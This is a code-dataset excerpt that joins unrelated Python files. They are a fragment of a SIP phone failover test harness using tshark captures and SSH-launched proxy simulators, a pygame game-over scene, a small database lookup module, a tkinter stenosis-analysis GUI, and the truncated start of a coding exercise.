self.tshark.omd_get_attr(reg_msg, \"ip.dst\")\n self.assertEqual(reg_rsc[0], dst_ip, \"Destination ip address is wrong\")\n\n # check whether fallback time is correct\n def check_fallback_time(self, msg1, msg2, msg3, transport='UDP'):\n log.info(\"Start to check fallback time\")\n time_frame_1 = self.tshark.omd_get_attr(\n msg1, 'frame.time_epoch')[0]\n time_frame_2 = self.tshark.omd_get_attr(\n msg2, 'frame.time_epoch')[0]\n time_frame_3 = self.tshark.omd_get_attr(\n msg3, 'frame.time_epoch')[0]\n if transport == 'UDP':\n failover_time = int(float(time_frame_2) - float(time_frame_1))\n fallback_time = int(float(time_frame_3) - float(time_frame_2))\n log.info('fallback_time is {}'.format(fallback_time))\n log.info('failover is {}'.format(failover_time))\n reg_expire_tmp = self.reg_expires - failover_time\n reg_timeout = reg_expire_tmp - (reg_expire_tmp * 7) / pow(2, 5)\n log.info('reg_time is {}'.format(reg_timeout))\n self.assertAlmostEqual(reg_timeout, fallback_time, delta=1)\n else:\n fallback_time = int(float(time_frame_2) - float(time_frame_1))\n register_expire = int(float(time_frame_3) - float(time_frame_1))\n log.info('fallback time is {} and register expire is {}'.format(\n fallback_time, register_expire))\n self.assertAlmostEqual(fallback_time, self.fallback_time, delta=1)\n if self.sip_method == 'register' and not self.try_backup_rsc:\n self.assertAlmostEqual(\n register_expire, self.reg_expires * 0.78, delta=2)\n elif self.try_backup_rsc and transport != 'TLS':\n self.assertAlmostEqual(\n register_expire, self.fallback_time, delta=2)\n log.info(\"Check fallback time end\")\n\n # start simproxy to simulate proxy\n def start_simproxy(\n self, simp_device, simp_file, svrip, svrport,\n sip_method='register', try_backup_rsc='200',\n sip_transport='UDP', key=None, cert=None, contacts=None):\n log.info(\"Start simproxy to do the testing\")\n simproxy_cmd = (\n \"python {} -i {} -p {} -u {} -r {} -t {} -k {} -c {} -s {}\".format(\n simp_file, svrip, svrport, sip_method, try_backup_rsc,\n sip_transport, key, cert, contacts))\n try:\n log.info(\"simproxy command is {}\".format(simproxy_cmd))\n simp_device.ssh.start_command(simproxy_cmd)\n except Exception:\n log.error(\"cannot start simproxy\", exc_info=True)\n\n # close simproxy subprocess\n def close_simproxy(self, simp_file, simp_device):\n log.info(\"Killing simproxy subprocess via pid\")\n pid_cmd = 'ps -ef|grep \"python {}\"'.format(simp_file)\n pid = re.match('.*? +(\\d+)', simp_device.ssh.get_command_output(\n pid_cmd)).group(1)\n kill_cmd = \"kill \" + format(pid)\n try:\n simp_device.ssh.get_command_output(kill_cmd)\n except Exception:\n log.error(\"cannot kill simproxy\", exc_info=True)\n\n def verify_uut_ipv6_addr(self, param):\n ipv6_addr = self.oPhone1.ui.get_param_value(param)\n return ipv6_addr != '::' and ipv6_addr != ''\n\n # run each test case according to different configurations\n def run_each_case(self, sip_transport):\n log.info(\"Start of run each test case\")\n expected_sip_flow = ''\n self.expect_msg = []\n # read different configurations for each case from csv file\n row = self.deq.popleft()\n log.info(\"row is {}\".format(row))\n self.auto_register = row['Auto register when failover']\n self.ip_mode = row['IP Mode']\n self.sip_preference = row['SIP IP Preference']\n self.proxy = row['Proxy']\n if sip_transport == 'TLS':\n self.proxy = self.proxy.format(\n IP1=self.simproxy, IP2=self.simproxy2nd)\n else:\n self.proxy = self.proxy.format(\n IP1=self.simproxy, IP2=self.secondary_proxy)\n log.info(\"proxy is {}\".format(self.proxy))\n self.outbound_proxy = row['Outbound Proxy']\n if sip_transport == 'TLS':\n self.outbound_proxy = self.outbound_proxy.format(\n IP1=self.simproxy, IP2=self.simproxy2nd)\n else:\n self.outbound_proxy = self.outbound_proxy.format(\n IP1=self.simproxy, IP2=self.secondary_proxy)\n log.info(\"outbound proxy is {}\".format(self.outbound_proxy))\n self.use_dns_srv = row['Use DNS SRV']\n self.dns_srv_auto_prefix = row['DNS SRV Auto Prefix']\n self.try_backup_rsc = row['Try Backup RSC']\n if sip_transport == 'UDP' and self.sip_method == 'register':\n expected_sip_flow = row['Expected sip flow for reg udp']\n elif sip_transport == 'TCP' and self.sip_method == 'register':\n expected_sip_flow = row['Expected sip flow for reg tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'invite':\n expected_sip_flow = row['Expected sip flow for inv udp']\n elif sip_transport == 'TCP' and self.sip_method == 'invite':\n expected_sip_flow = row['Expected sip flow for inv tcp']\n elif sip_transport == 'UDP' and self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for reinv udp']\n elif sip_transport == 'TCP' and self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for reinv tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'bye':\n expected_sip_flow = row['Expected sip flow for bye udp']\n elif sip_transport == 'TCP' and self.sip_method == 'bye':\n expected_sip_flow = row['Expected sip flow for bye tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'subscribe':\n expected_sip_flow = row['Expected sip flow for sub udp']\n elif sip_transport == 'TCP' and self.sip_method == 'subscribe':\n expected_sip_flow = row['Expected sip flow for sub tcp']\n elif sip_transport == 'TLS':\n if self.sip_method == 'bye' or self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for tls']\n else:\n expected_sip_flow = 'tls'\n log.info(\"expect flow is {}\".format(expected_sip_flow))\n if expected_sip_flow == '':\n self.skipTest(\"Skip cases for bye and reinvite if auto reg is yes\")\n # change value for expected_sip_flow to list format\n self.expect_msg.extend(expected_sip_flow.split())\n # start Tshark to capture packets\n log.info('Start tshark on linux')\n if self.ip_mode == 'IPv6 Only':\n filter_cmd = (\n 'host {}'.format(self.phone_ipaddr6))\n elif self.ip_mode == 'IPv4 Only':\n filter_cmd = (\n 'host {}'.format(self.phone_ipaddr))\n else:\n until(\n self.verify_uut_ipv6_addr,\n args=('Current IP_IPV6', ),\n timeout=30,\n raise_msg='Timeout, Cannot get ipv6 address of oPhone1')\n filter_cmd = 'host {} or host {}'.format(\n self.phone_ipaddr,\n self.phone_ipaddr6)\n self.capture_file = self.tshark.tshark_start(filter_cmd)\n # open simproxy to simulate primary proxy for IPv4\n # open simproxy6 to simulate primary proxy for IPv6\n response_code = self.try_backup_rsc or '0'\n if self.try_backup_rsc or self.sip_method != 'register':\n self.start_simproxy(\n self.simp_device, 'simproxy.py', self.simproxy, self.sip_port,\n self.sip_method, response_code, sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n self.start_simproxy(\n self.simp6_device, 'simproxyv6.py', self.simproxy6,\n self.sip_port, self.sip_method, response_code, sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n else:\n log.info(\"No need to start simproxy\")\n if sip_transport == 'TLS':\n self.start_simproxy(\n self.simp2nd_device, 'simproxy.py', self.simproxy2nd,\n self.sip_port, self.sip_method, '200', sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n self.start_simproxy(\n self.simp2nd6_device, 'simproxyv6.py', self.simproxy2nd6,\n self.sip_port, self.sip_method, '200', sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n\n # set parameters to the values gotten from csv file\n self.oPhone1.ui.set_web_parameter_http(\n Proxy=['Ext 1', 'Proxy', self.proxy],\n Auto_Reg=[\n 'Ext 1', 'Auto Register When Failover', self.auto_register],\n SIP_Preference=['SIP', 'SIP IP Preference', self.sip_preference],\n Try_Backup_RSC=['SIP', 'Try Backup RSC', self.try_backup_rsc],\n IP_Mode=['System', 'IP Mode', self.ip_mode],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', self.outbound_proxy],\n Share_Call_Appearance=[\n 'Phone', 'Line Key 1', 'Share Call Appearance',\n self.share_call_appearance],\n Share_Ext=['Ext 1', 'Share Ext', self.share_ext],\n Feature_Key_Sync=[\n 'Ext 1', 'Feature Key Sync', self.feature_key_sync],\n Hoteling=['Ext 1', 'Enable Broadsoft Hoteling', self.hoteling],\n BLF_Use_Line=[\n 'Att Console', 'Use Line Keys For BLF List',\n self.blf_use_line],\n SIP_Transport=['Ext 1', 'SIP Transport', sip_transport],\n DNS_SRV=['Ext 1', 'Use DNS SRV', self.use_dns_srv],\n DNS_SRV_Prefix=[\n 'Ext 1', 'DNS SRV Auto Prefix', self.dns_srv_auto_prefix])\n\n proxy_check = self.convert_set_value_for_check(self.proxy)\n auto_register_check = self.convert_set_value_for_check(\n self.auto_register)\n try_backup_rsc_check = self.convert_set_value_for_check(\n self.try_backup_rsc)\n outbound_proxy_check = self.convert_set_value_for_check(\n self.outbound_proxy)\n use_dns_srv_check = self.convert_set_value_for_check(self.use_dns_srv)\n dns_srv_auto_prefix_check = self.convert_set_value_for_check(\n self.dns_srv_auto_prefix)\n feature_key_sync_check = self.convert_set_value_for_check(\n self.feature_key_sync)\n hoteling_check = self.convert_set_value_for_check(self.hoteling)\n blf_use_line_check = self.convert_set_value_for_check(\n self.blf_use_line)\n share_ext_check = self.convert_set_value_for_check(self.share_ext)\n\n self.check_phone_settings(\n self.oPhone1,\n Proxy=['Proxy_1_', proxy_check],\n Auto_Reg=['Auto_Register_When_Failover_1_', auto_register_check],\n SIP_Preference=['SIP_IP_Preference', self.sip_preference],\n Try_Backup_RSC=['Try_Backup_RSC', try_backup_rsc_check],\n IP_Mode=['IP_Mode', self.ip_mode],\n Outbound_Proxy=['Outbound_Proxy_1_', outbound_proxy_check],\n Share_Call_Appearance=[\n 'Share_Call_Appearance_1_', self.share_call_appearance],\n Share_Ext=['Share_Ext_1_', share_ext_check],\n Feature_Key_Sync=['Feature_Key_Sync_1_', feature_key_sync_check],\n Hoteling=['Enable_Broadsoft_Hoteling_1_', hoteling_check],\n SIP_Transport=['SIP_Transport_1_', sip_transport],\n DNS_SRV=['Use_DNS_SRV_1_', use_dns_srv_check],\n DNS_SRV_Prefix=[\n 'DNS_SRV_Auto_Prefix_1_', dns_srv_auto_prefix_check])\n\n # make sure the phone can fallback to the 1st server\n if not self.try_backup_rsc:\n if (sip_transport == 'UDP' and self.sip_method == 'register') or (\n self.sub_type == 'blf') or (\n self.auto_register == '1' and self.sip_method == 'invite'):\n self.time_to_wait_capture = (\n self.time_to_wait_capture + self.sip_timer_F)\n if self.ip_mode == 'Dual Mode':\n self.time_to_wait_capture = (\n self.time_to_wait_capture +\n self.sip_timer_F)\n if self.sip_method == 'invite' or self.sip_method == 'bye' or (\n self.sip_method == 're-invite-hold'):\n self.oPhone1.ccapi.dial('NULL', '123', '', 1, 0, 1)\n wait_for_ccapi_call_states(\n [self.oPhone1], [\"CONNECTED\"], timeout=40)\n if self.sip_method == 're-invite-hold':\n self.oPhone1.ccapi.hold('0000')\n if self.sip_transport == 'TLS':\n wait_for_ccapi_call_states(\n [self.oPhone1], [\"HOLD\"], timeout=20)\n self.oPhone1.ccapi.hangUp('0000')\n else:\n self.oPhone1.ccapi.hangUp('0000')\n wait(self.time_to_wait_capture, 'Until fallback to the 1st server')\n # change time_to_wait_capture back to register expire\n self.time_to_wait_capture = self.reg_expires\n log.info('Stop Tshark on Linux')\n self.tshark.tshark_stop()\n log.info(\"End of run each test case\")\n\n # get frame number of sip message for TLS protocol\n def get_frame_number_tls(self, phone_ip, simproxy):\n if ':' in phone_ip:\n filter_reg_ok = (\n 'tcp && !(tcp.port==80) && (ipv6.dst == ' +\n phone_ip + ') && (ipv6.src == ' +\n simproxy + ') && (ssl.record.content_type == 23)')\n else:\n filter_reg_ok = (\n 'tcp && !(tcp.port==80) && (ip.dst == ' +\n phone_ip + ') && (ip.src == ' +\n simproxy + ') && (ssl.record.content_type == 23)')\n self.msg_reg_ok = self.tshark.omd_read(\n self.capture_file, filter_reg_ok)\n frame_number = self.tshark.omd_get_attr(\n self.msg_reg_ok[0], \"frame.number\")[0]\n return frame_number\n\n # get TCP connection for TCP and TLS\n def get_tcp_connection(self, frame_number, phone_ip, server_ip, number):\n if number == '1':\n if ':' in phone_ip:\n if self.sip_method == 'register':\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n else:\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.fin==1)')\n return self.tshark.omd_read(self.capture_file, filter1)\n else:\n if self.sip_method == 'register':\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n else:\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.fin==1)')\n return self.tshark.omd_read(self.capture_file, filter1)\n\n # after fallback time, re-establish tcp connection\n elif number == '2':\n if ':' in phone_ip:\n filter1_2 = (\n 'tcp && !(sip) && (frame.number >= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n return self.tshark.omd_read(self.capture_file, filter1_2)\n else:\n filter1_2 = (\n 'tcp && !(sip) && (frame.number >= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n return self.tshark.omd_read(self.capture_file, filter1_2)\n\n # analyse the sniffer for register destination and fallback time\n # for Dual mode, the 1st and 2nd register are sent to simproxy\n # for IPv4 or IPv6 only mode, only the 1st register is sent to simproxy\n # the register which response is 200ok is sent to secondary proxy\n def analyse_tshark_capture_reg(self, sip_transport):\n log.info(\"Start to analyse tshark packet\")\n # get index of 200Ok to register to the secondary proxy\n if sip_transport.upper() in ['UDP', 'TCP']:\n packets = self.tshark.omd_read(\n self.capture_file, filter='sip',\n other_args=self.ignore_tcp_seq)\n log.info(\"expected msgs are {}\".format(self.expect_msg))\n msgs = self.tshark.omd_check_sip_msgs(packets, self.expect_msg)\n self.index_200 = self.expect_msg.index('200')\n if sip_transport == 'UDP':\n self.index_2nd_reg = self.expect_msg.index('register', 1)\n elif sip_transport == 'TCP':\n self.frame_number = self.tshark.omd_get_attr(\n packets[self.index_200], \"frame.number\")[0]\n # for IPv6, the first registration destination is simproxy6\n # for IPv4, the first registration destination is simproxy\n if self.sip_preference == 'IPv6':\n log.info(\"IPv6, first reg send to simproxy6\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(\n msgs[self.index_200-1], self.secondary_proxy6)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr6, self.simproxy2nd6)\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(msgs[0], self.simproxy6)\n else:\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv6 preference, Dual mode\")\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(\n msgs[self.index_2nd_reg], self.simproxy)\n else:\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr,\n self.simproxy, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr,\n self.simproxy, '2')\n else:\n log.info(\"IPv4, first reg send to simproxy\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(\n msgs[self.index_200-1], self.secondary_proxy)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr, self.simproxy2nd)\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(msgs[0], self.simproxy)\n else:\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv4 preference, Dual mode\")\n if sip_transport == 'UDP':\n self.check_sip_reg_dst(\n msgs[self.index_2nd_reg], self.simproxy6)\n else:\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '2')\n\n # check the fallback time between the 1st register and time registered\n if sip_transport == 'TCP':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n msgs[self.index_200 + 1], self.sip_transport)\n elif sip_transport == 'TLS':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n self.msg_reg_ok[1], self.sip_transport)\n else:\n self.check_fallback_time(\n msgs[0], msgs[self.index_200], msgs[self.index_200+1],\n self.sip_transport)\n log.info(\"Analyse tshark packet is done\")\n\n # analyse the sniffer for non-register sip messages\n def analyse_tshark_capture_other(self, sip_transport):\n log.info(\"Start to analyse tshark packet\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n if self.sub_type == 'blf':\n packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip)&&!(sip.Method==\"ACK\")&&' +\n '!(sip.Status-Code == 481)&&' +\n '!(sip.Subscription-State == \"terminated\")',\n other_args=self.ignore_tcp_seq)\n else:\n packets = self.tshark.omd_read(\n self.capture_file, filter='(sip)&&!(sip.Method==\"ACK\")',\n other_args=self.ignore_tcp_seq)\n log.info(\"expected msgs are {}\".format(self.expect_msg))\n msgs = self.tshark.omd_check_sip_msgs(packets, self.expect_msg)\n self.assertTrue(msgs)\n if self.sip_method == 're-invite-hold':\n expect_packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip)&&(sdp.media_attr==\"sendonly\")&&' +\n '(sip.resend==0)',\n other_args=self.ignore_tcp_seq)\n else:\n expect_packets = self.tshark.omd_read(\n self.capture_file, filter=(\n '(sip.Method==\"{}\")&&(sip.resend==0)'.format(\n self.sip_method.upper())),\n other_args=self.ignore_tcp_seq)\n reg_packets = self.tshark.omd_read(\n self.capture_file,\n filter='(sip.Method==\"REGISTER\")&&(sip.resend==0)',\n other_args=self.ignore_tcp_seq)\n if self.sip_method == 'subscribe':\n index = len(self.expect_msg) - 1 - self.expect_msg[::-1].index(\n 'notify')\n else:\n index = len(self.expect_msg) - 1 - self.expect_msg[::-1].index(\n 'bye')\n self.frame_number = self.tshark.omd_get_attr(\n packets[index], \"frame.number\")[0]\n # for IPv4, the first registration destination is simproxy\n if self.sip_preference == 'IPv6':\n log.info(\"IPv6, first reg send to simproxy6\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(expect_packets[0], self.simproxy6)\n self.check_sip_reg_dst(reg_packets[0], self.simproxy6)\n self.check_sip_reg_dst(expect_packets[1], self.simproxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(reg_packets[1], self.simproxy)\n self.check_sip_reg_dst(\n expect_packets[2], self.secondary_proxy6)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[2], self.secondary_proxy6)\n if self.use_dns_srv == '1' and sip_transport == 'UDP' and (\n self.auto_register == '1'):\n self.check_sip_reg_dst(\n msgs[index + 2], self.simproxy6)\n if self.sip_method == 'subscribe' and (\n self.auto_register == '1' and self.try_backup_rsc):\n self.check_sip_reg_dst(\n msgs[index + 4], self.simproxy6)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr6, self.simproxy2nd6)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6, self.simproxy6, '2')\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n log.info(\"tls or tcp connection check done\")\n\n else:\n log.info(\"IPv4, first reg send to simproxy\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(reg_packets[0], self.simproxy)\n self.check_sip_reg_dst(expect_packets[0], self.simproxy)\n if self.ip_mode == 'IPv4 Only':\n self.check_sip_reg_dst(\n expect_packets[1], self.secondary_proxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[1], self.secondary_proxy)\n else:\n self.check_sip_reg_dst(\n expect_packets[2], self.secondary_proxy)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(\n reg_packets[2], self.secondary_proxy)\n if self.use_dns_srv == '1' and sip_transport == 'UDP' and (\n self.auto_register == '1'):\n self.check_sip_reg_dst(\n msgs[index + 2], self.simproxy)\n if self.sip_method == 'subscribe' and (\n self.auto_register == '1' and self.try_backup_rsc):\n self.check_sip_reg_dst(\n msgs[index + 4], self.simproxy)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr, self.simproxy2nd)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection1 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '1')\n tcp_connection1_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr, self.simproxy, '2')\n\n if self.ip_mode == 'Dual Mode':\n log.info(\"IPv4 preference, Dual mode\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(expect_packets[1], self.simproxy6)\n if self.auto_register == '1' or sip_transport == 'TCP':\n self.check_sip_reg_dst(reg_packets[1], self.simproxy6)\n if sip_transport.upper() in ['TLS', 'TCP']:\n log.info(\"tls or tcp connection check\")\n tcp_connection2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '1')\n tcp_connection2_2 = self.get_tcp_connection(\n self.frame_number, self.phone_ipaddr6,\n self.simproxy6, '2')\n log.info(\"tls or tcp connection check done\")\n\n # check the fallback time\n if sip_transport == 'TCP':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n msgs[index + 2], sip_transport)\n elif sip_transport == 'TLS':\n self.check_fallback_time(\n tcp_connection1[0], tcp_connection1_2[0],\n self.msg_reg_ok[-1], sip_transport)\n log.info(\"Analyse tshark packet is done\")\n","sub_path":"common/Signaling/cmSG_3pcc_failover_fallback_base.py","file_name":"cmSG_3pcc_failover_fallback_base.py","file_ext":"py","file_size_in_byte":43967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"312882705","text":"import pygame\nfrom Scenes.Scene import Scene\nfrom Shared import *\nfrom Highscore import *\n\nclass GameOverScene(Scene):\n\n\tdef __init__(self, game):\n\t\tsuper(GameOverScene, self).__init__(game)\n\n\t\tself.__playerName = \"\"\n\t\tself.__highscoreSprite = pygame.image.load(GameConstants.SPRITE_HIGHSCORE)\n\n\tdef render(self):\n\n\t\tself.getGame().screen.blit(self.__highscoreSprite, (10, 10))\n\n\t\tself.clearText()\n\t\tself.addText(\"Your name: \", 300, 200, size=30)\n\t\tself.addText(self.__playerName, 420, 200, size=30)\n\t\tsuper(GameOverScene, self).render()\n\n\tdef handleEvents(self, events):\n\t\tsuper(GameOverScene, self).handleEvents(events)\n\n\t\tfor event in events:\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\texit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_RETURN:\n\t\t\t\t\tgame = self.getGame()\n\t\t\t\t\tHighscore().add(self.__playerName, game.getScore())\n\t\t\t\t\tgame.reset()\n\t\t\t\t\tgame.changeScene(GameConstants.HIGHSCORE_SCENE)\n\t\t\t\telif event.key >= 65 and event.key <= 122:\n\t\t\t\t\tself.__playerName += chr(event.key)\n\t\t\t\tif event.key == pygame.K_F1:\n\t\t\t\t\tself.getGame().reset()\n\t\t\t\t\tself.getGame().changeScene(GameConstants.PLAYING_SCENE)","sub_path":"Pygame4/Course_Project/Game/Scenes/GameOverScene.py","file_name":"GameOverScene.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"459146947","text":"\"\"\"\n Core operations of Judi\n\n Usage:\n > import judi\n > judi.connect()\n True\n > judi.search('5134412')\n ('5134412', 'Trademark', 'AWESOME TRADEMARK', 'China', 'CHN', 'Super Awesome Agent', '1111')\n\"\"\"\n\nimport logging\nimport sqlite3\nimport pyodbc\nfrom src.resources.constant import (CONNECTION_STR_SQLITE,\n DB_APP,\n DB_DATABASE,\n DB_DRIVER,\n DB_SERVER,\n DB_PASSWORD,\n DB_USERNAME,\n GIPM_RECORD,\n SEARCH_SQL_FILE,\n LOGGER)\n\nCURSOR = None\nLOGGER = logging.getLogger(__name__)\n\n\ndef live_connection():\n \"\"\" Connecting to GIPM. \"\"\"\n\n global CURSOR\n LOGGER.info('Connecting to GIPM...')\n conn = pyodbc.connect(driver=DB_DRIVER,\n server=DB_SERVER,\n database=DB_DATABASE,\n uid=DB_USERNAME,\n pwd=DB_PASSWORD,\n app=DB_APP)\n CURSOR = conn.cursor()\n LOGGER.info('You are now connected to GIPM')\n return True\n\n\ndef dev_connection():\n \"\"\" Connecting to SQLite. For development only.\n\n return -> bool\n \"\"\"\n\n global CURSOR\n LOGGER.info('Connecting to SQLite...')\n conn = sqlite3.connect(CONNECTION_STR_SQLITE)\n LOGGER.info('Good! You are now connected to SQLite')\n CURSOR = conn.cursor()\n return True\n\n\ndef connect():\n \"\"\" Establish server/database connection.\n\n return -> bool\n \"\"\"\n\n try:\n #return live_connection()\n return dev_connection()\n except pyodbc.OperationalError as e:\n LOGGER.error(f'Connection failed. Try again. {e} -> Type: {type(e)}')\n return False\n\n\ndef search(grn):\n \"\"\" Search record in GIPM using the given GRN.\n\n return -> namedtuple\n \"\"\"\n\n grn = (grn,)\n CURSOR.execute(SEARCH_SQL_FILE, grn)\n results = CURSOR.fetchall()\n\n if len(results) >= 2:\n record = GIPM_RECORD._make(results[0])\n return record._replace(trademark='MULTIPLE MARKS')\n elif len(results) == 1:\n return GIPM_RECORD._make(results[0])\n else:\n return None\n\n\ndef disconnect():\n \"\"\" Disconnect from SQLite. For development only. \"\"\"\n\n CURSOR.close()\n","sub_path":"src/core/judi.py","file_name":"judi.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"42928313","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom classification import VideoAnalyzer\nfrom segmentation import Segmentor\nfrom modules.sten_measure import Sten_Measure\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass main_view():\n\tdef __init__(self):\n\t\tself.analyzer = VideoAnalyzer()\n\t\tself.segmentor = Segmentor()\n\t\tself.measure = Sten_Measure()\n\t\tself.video = ''\n\t\tself.classification_results = plt.figure()\n\t\tself.segmentation_results = plt.figure()\n\t\tself.frames_array = np.empty((0,512,512,1))\n\t\tself.frames_array = np.empty((0,512,512,1))\n\t\tself.stenosis = 0\n\t\tself.stenosis_loc = ''\n\t\tself.root = Tk()\n\t\tself.root.title('Integrated Stenosis Measurement Toolkit')\n\t\t# self.root.geometry('1920*1680')\n\t\tself.load_button = Button(self.root, text = 'load video', command = self.load, height = 200, width = 100)\n\t\tself.load_button.pack()\n\n\t\tself.analyze_button = Button(self.root, text = 'analyze', command = self.analyze)\n\t\tself.analyze_button.pack()\n\n\n\t\tself.root.mainloop()\n\n\tdef load(self):\n\t\tself.video = askopenfilename(\n\t\t\tinitialdir = \"/\",title = \"Select file\",filetypes = ((\"video files\",\"*.mp4\"),(\"all files\",\"*.*\")))\n\t\tmsg = Message(self.root, text = 'video loaded')\n\t\tmsg.pack()\n\n\tdef analyze(self):\n\t\tself.classification_results,self.frames_array = self.analyzer.analyze(self.video)\n\t\tself.segmentation_results,self.masks_array = self.segmentor.analyze(self.frames_array)\n\t\tself.masks_array = np.array(self.masks_array, dtype=np.uint8)\n\t\tself.stenosis, self.stenosis_loc = self.measure.analyze(self.masks_array)\n\t\t\n\t\t\n\t\tmsg = Message(self.root, text = 'done analyzing')\n\t\tmsg.pack()\n\t\t\n\t\tself.show_class_button = Button(self.root, text = 'key frames', command = self.show_classification)\n\t\tself.show_class_button.pack()\n\n\t\tself.show_segment_button = Button(self.root, text = 'vessel segmentation',command = self.show_segmentation)\n\t\tself.show_segment_button.pack()\n\t\t\n\t\tself.show_segment_button = Button(self.root, text = 'stenosis measurement',command = self.show_measurement)\n\t\tself.show_segment_button.pack()\n\n\tdef show_classification(self):\n\t\tself.classification_results.show()\n\n\tdef show_segmentation(self):\n\t\tself.segmentation_results.show()\n\n\tdef show_measurement(self):\n\t\tmsg1 = Message(self.root, text = self.stenosis)\n\t\tmsg2 = Message(self.root, text = self.stenosis_loc)\n\t\tmsg1.pack()\n\t\tmsg2.pack()\n\nview = main_view()","sub_path":"interface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359463151","text":"#!/usr/bin/env checkio --domain=py run even-last\n\n# https://py.checkio.org/mission/even-last/\n\n# You are given an array of integers. You should find the sum of the elements with even indexes (0th, 2nd, 4th...) then multiply this summed number and the 